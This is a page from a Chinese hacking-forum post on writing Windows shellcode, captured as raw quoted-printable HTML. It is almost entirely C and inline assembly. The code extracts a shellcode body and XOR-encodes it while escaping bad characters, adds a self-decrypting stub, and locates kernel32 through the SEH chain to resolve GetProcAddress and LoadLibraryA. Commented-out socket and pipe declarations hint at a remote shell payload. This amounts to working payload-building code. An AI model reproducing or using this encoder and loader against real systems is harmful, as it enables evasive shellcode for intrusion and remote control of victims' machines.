📄 关于windows下shellcode编写的一点思考.mht

📁 精华BBS贴子
💻 MHT
📖 第 1 页 / 共 5 页
字号:
                        break;<BR>&nbsp;&nbsp;if (k&lt;MAX_Enc_Len)=20
                        pSc_addr+=3D(k+8);&nbsp;=20
                        =
&nbsp;//=C8=E7=D5=D2=B5=BD=B6=A8=CE=BB=CA=B5=BC=CA=B4=FA=C2=EB=B5=C4=BF=AA=
=CA=BC<BR>&nbsp;&nbsp;*/<BR><BR>&nbsp;&nbsp;//=D5=D2=B5=BDshellcode=B5=C4=
=BD=E1=CE=B2=BC=B0=B3=A4=B6=C8<BR>&nbsp;&nbsp;for(k=3D0;k&lt;MAX_Sc_Len;+=
+k)=20
                        =
if(memcmp(pSc_addr+k,fnend_str,ENDSTRLEN)=3D=3D0)=20
                        break;<BR>&nbsp;&nbsp;if (k&lt;MAX_Sc_Len)=20
                        Sc_len=3Dk;<BR>&nbsp;&nbsp;else=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;k=3D0;<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;printf("\nNo End=20
                        str defined in ShellCodes function!Please=20
                        Check....\n");<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;return=20
                        =
0;<BR>&nbsp;&nbsp;}<BR><BR><BR>&nbsp;&nbsp;//=B0=D1shellcode=B4=FA=C2=EB=B8=
=B4=D6=C6=BD=F8sc_buff<BR>&nbsp;&nbsp;memcpy(sc_buff,pSc_addr,Sc_len);<BR=
><BR>&nbsp;&nbsp;//=B0=D1=D7=D6=B7=FB=B4=AE=BF=BD=B1=B4=D4=DAshellcode=B5=
=C4=BD=E1=CE=B2<BR>&nbsp;&nbsp;for(i=3D0;i&lt;MAX_api_strlen;++i)=20
                        =
if(memcmp(ApiStr+i,"strend",API_endstrlen)=3D=3D0)=20
                        =
break;<BR>&nbsp;&nbsp;if(i&gt;=3DMAX_api_strlen)<BR>&nbsp;&nbsp;{<BR>&nbs=
p;=20
                        &nbsp;&nbsp; &nbsp;printf("\nNo End str defined =
in API=20
                        strings!Please Check....\n");<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;return=20
                        =
0;<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;memcpy(sc_buff+k,ApiStr,i);<BR><BR>&nb=
sp;&nbsp;Sc_len+=3Di;&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=D4=F6=BC=D3shellcode=B5=C4=B3=A4=B6=C8<BR><BR>&nbsp;=
&nbsp;//<BR>&nbsp;&nbsp;//=B6=D4shellcode=BD=F8=D0=D0=B1=E0=C2=EB=CB=E3=B7=
=A8=BC=F2=B5=A5=A3=AC=BF=C9=B8=F9=BE=DD=D0=E8=D2=AA=B8=C4=B1=E4<BR>&nbsp;=
&nbsp;//<BR>&nbsp;&nbsp;k=3DEncCode_len+nop_LEN;&nbsp;=20
                        &nbsp;=20
                        =
//=B6=A8=CE=BB=BB=BA=B3=E5=C7=F8=D3=A6=B4=E6=B7=C5ShellCode=B5=D8=D6=B7=B5=
=C4=BF=AA=CA=BC<BR><BR>&nbsp;&nbsp;for(i=3D0;i&lt;Sc_len;++i){<BR><BR>&nb=
sp;=20
                        =
&nbsp;&nbsp;&nbsp;ch=3Dsc_buff[i]^Enc_key;<BR>&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=B6=D4=D2=BB=D0=A9=BF=C9=C4=DC=D4=EC=B3=C9shellcode=CA=
=A7=D0=A7=B5=C4=D7=D6=B7=FB=BD=F8=D0=D0=CC=E6=BB=BB<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;if(ch&lt;=3D0x1f||ch=3D=3D'=20
                        =
'||ch=3D=3D'.'||ch=3D=3D'/'||ch=3D=3D'\\'||ch=3D=3D'0'||ch=3D=3D'?'||ch=3D=
=3D'%'||ch=3D=3D'+')<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;buff[k]=3D'0';<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;++k;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;ch+=3D0x31;<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;}<BR>&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=B0=D1=B1=E0=C2=EB=B9=FD=B5=C4shellcode=B7=C5=D4=DADe=
cryptSc=B4=FA=C2=EB=BA=F3=C3=E6<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;buff[k]=3Dch;<BR>&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;++k;<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;//shellcode=B5=
=C4=D7=DC=B3=A4=B6=C8<BR>&nbsp;&nbsp;buff_len=3Dk;<BR><BR>&nbsp;&nbsp;//=B4=
=F2=D3=A1=B3=F6shellcode<BR>&nbsp;&nbsp;PrintSc(buff,buff_len);<BR>&nbsp;=
&nbsp;//buff[buff_len]=3D0;<BR>&nbsp;&nbsp;//printf("%s",buff);<BR><BR>#i=
fdef=20
                        DEBUG<BR>&nbsp;&nbsp;_asm{<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;lea eax,buff<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;jmp=20
                        eax<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;ret<BR>&nbsp;&nbsp;}<BR>#endif<BR><BR>&nbsp;=20
                        &nbsp;=20
                        =
return&nbsp;&nbsp;0;<BR>}<BR><BR>//=BD=E2=C2=EBshellcode=B5=C4=B4=FA=C2=EB=
<BR>void&nbsp;&nbsp;DecryptSc()<BR>{<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;=20
                        =
__asm{<BR><BR>/////////////////////////<BR>//=B6=A8=D2=E5=BF=AA=CA=BC=B1=EA=
=D6=BE<BR>/////////////////////////<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; =
PROC_BEGIN&nbsp; &nbsp;=20
                        //C macro to begin proc<BR><BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; jmp&nbsp;=20
                        &nbsp;next<BR>getEncCodeAddr:<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; pop&nbsp; =
&nbsp;edi<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;=20
                        push&nbsp;&nbsp;edi<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; pop&nbsp; &nbsp;esi<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; xor&nbsp;=20
                        &nbsp;ecx,ecx<BR>Decrypt_lop: <BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp; lodsb<BR>&nbsp; &nbsp;&nbsp; =

                        &nbsp;&nbsp; &nbsp; =
cmp&nbsp;&nbsp;al,cl<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; jz&nbsp;=20
                        &nbsp;shell<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;=20
                        =
cmp&nbsp;&nbsp;al,0x30&nbsp;&nbsp;//=C5=D0=B6=CF=CA=C7=B7=F1=CE=AA=CC=D8=CA=
=E2=D7=D6=B7=FB<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; jz&nbsp;=20
                        &nbsp;special_char_clean<BR>store:&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;=20
                        xor&nbsp;&nbsp;al,Enc_key<BR>&nbsp; &nbsp;&nbsp; =

                        &nbsp;&nbsp; &nbsp; stosb<BR>&nbsp; &nbsp;&nbsp; =

                        &nbsp;&nbsp; &nbsp;=20
                        =
jmp&nbsp;&nbsp;Decrypt_lop<BR>special_char_clean:&nbsp;=20
                        &nbsp;<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;=20
                        lodsb<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; =
sub=20
                        al,0x31<BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp; jmp=20
                        store<BR>next:&nbsp; =
&nbsp;&nbsp;&nbsp;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;=20
                        call&nbsp;&nbsp;getEncCodeAddr<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;=20
                        =
//=C6=E4=D3=E0=D5=E6=D5=FD=BC=D3=C3=DC=B5=C4shellcode=B4=FA=C2=EB=BB=E1=C1=
=AC=BD=D3=D4=DA=B4=CB=B4=A6<BR>shell:&nbsp; &nbsp;=20
                        =
<BR><BR>/////////////////////////<BR>//=B6=A8=D2=E5=BD=E1=CA=F8=B1=EA=D6=BE=
<BR>/////////////////////////<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; PROC_END&nbsp;=20
                        &nbsp;&nbsp; &nbsp;//C macro to end =
proc<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp; }<BR>}&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;<BR><BR>//<BR>//shellcode=B4=FA=C2=EB<BR>//<BR>void=20
                        ShellCodes()<BR>{<BR>&nbsp; &nbsp; =
//API=B5=CD=D6=B7=CA=FD=D7=E9&nbsp;=20
                        &nbsp; <BR>&nbsp; &nbsp; FARPROC&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;API[API_num];<BR><BR><BR>&nbsp; &nbsp;=20
                        =
//=D7=D4=BC=BA=BB=F1=C8=A1=B5=C4API=B5=D8=D6=B7<BR>&nbsp; &nbsp; =
FARPROC&nbsp;=20
                        &nbsp;&nbsp;&nbsp;GetProcAddr;<BR>&nbsp; &nbsp;=20
                        FARPROC&nbsp; &nbsp; LoadLib;<BR><BR>&nbsp; =
&nbsp;=20
                        HANDLE&nbsp; &nbsp;&nbsp; =
&nbsp;hKrnl32;<BR>&nbsp;=20
                        &nbsp; HANDLE&nbsp; &nbsp;&nbsp;=20
                        &nbsp;libhandle;<BR><BR>&nbsp; &nbsp; char&nbsp; =

                        &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;*ApiStr_addr,*p;<BR>&nbsp; =
&nbsp;=20
                        <BR>&nbsp; &nbsp; int&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;k;<BR>&nbsp; &nbsp; u_short&nbsp;=20
                        &nbsp;&nbsp;&nbsp;shellcodeport;<BR><BR>&nbsp; =
&nbsp;=20
                        //=B2=E2=CA=D4=D3=C3=B1=E4=C1=BF<BR>&nbsp; =
&nbsp; char&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;*testAddr;<BR><BR>/*<BR>&nbsp; =
&nbsp;=20
                        STARTUPINFO siinfo;<BR>&nbsp; &nbsp; =
SOCKET&nbsp;=20
                        &nbsp;&nbsp; &nbsp;listenFD,clientFD;<BR>&nbsp; =
&nbsp;=20
                        struct&nbsp; &nbsp;&nbsp; &nbsp;sockaddr_in=20
                        server;<BR>&nbsp; &nbsp; int&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;iAddrSize =3D =
sizeof(server);<BR>&nbsp;=20
                        &nbsp; int&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;lBytesRead;<BR>&nbsp; &nbsp; =
PROCESS_INFORMATION=20
                        ProcessInformation;<BR>&nbsp; &nbsp; =
HANDLE&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;<BR>&nbsp;=20
                        &nbsp; SECURITY_ATTRIBUTES =
sa;<BR><BR>*/<BR><BR><BR>_asm=20
                        {<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;jmp&nbsp;=20
                        &nbsp; locate_addr0<BR>getApiStr_addr:<BR>&nbsp; =

                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;pop&nbsp; &nbsp;=20
                        ApiStr_addr<BR><BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=BF=AA=CA=BC=BB=F1=C8=A1API=B5=C4=B5=D8=D6=B7=D2=D4=BC=
=B0GetProcAddress=BA=CDLoadLibraryA=B5=C4=B5=D8=D6=B7<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;//=D2=D4=BA=F3=BE=CD=BF=C9=D2=D4=B7=BD=B1=E3=B5=D8=BB=F1=
=C8=A1=C8=CE=BA=CEAPI=B5=C4=B5=D8=D6=B7=C1=CB<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;//=B1=A3=BB=A4=BC=C4=B4=E6=C6=F7<BR>&nbsp;=20
                        &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;pushad<BR><BR>&nbsp;=20
                        &nbsp; xor&nbsp; =
&nbsp;&nbsp;&nbsp;esi,esi<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;lods&nbsp; &nbsp; =
dword=20
                        ptr fs:[esi]<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;<BR>Search_Krnl32_lop:<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;inc&nbsp;=20
                        &nbsp;&nbsp;&nbsp;eax<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;je&nbsp; &nbsp;&nbsp;=20
                        &nbsp;Krnl32_Base_Ok<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;dec&nbsp;=20
                        &nbsp;&nbsp;&nbsp;eax<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;xchg&nbsp; &nbsp; =
esi,eax<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;LODSD&nbsp;&nbsp;<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;jmp&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;Search_Krnl32_lop<BR>Krnl32_Base_Ok:<BR><BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;LODSD&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; <BR>&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;&nbsp;;compare if=20
                        PE_hdr<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;xchg&nbsp; &nbsp; =
esi,eax<BR>&nbsp;=20
                        &nbsp; find_pe_header:<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;dec&nbsp;=20
                        &nbsp;&nbsp;&nbsp;esi<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;xor&nbsp;=20
                        &nbsp;&nbsp;&nbsp;si,si&nbsp; &nbsp;&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;;kernel32 is 64kb =
align<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;&nbsp;mov&nbsp;=20
                        &nbsp;&nbsp;&nbsp;eax,[esi]<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;add&nbsp;=20
                        &nbsp;&nbsp;&nbsp;ax,-'ZM'&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp;&nbsp;;&nbsp; &nbsp;&nbsp; &nbsp; =
<BR>&nbsp;=20
                     
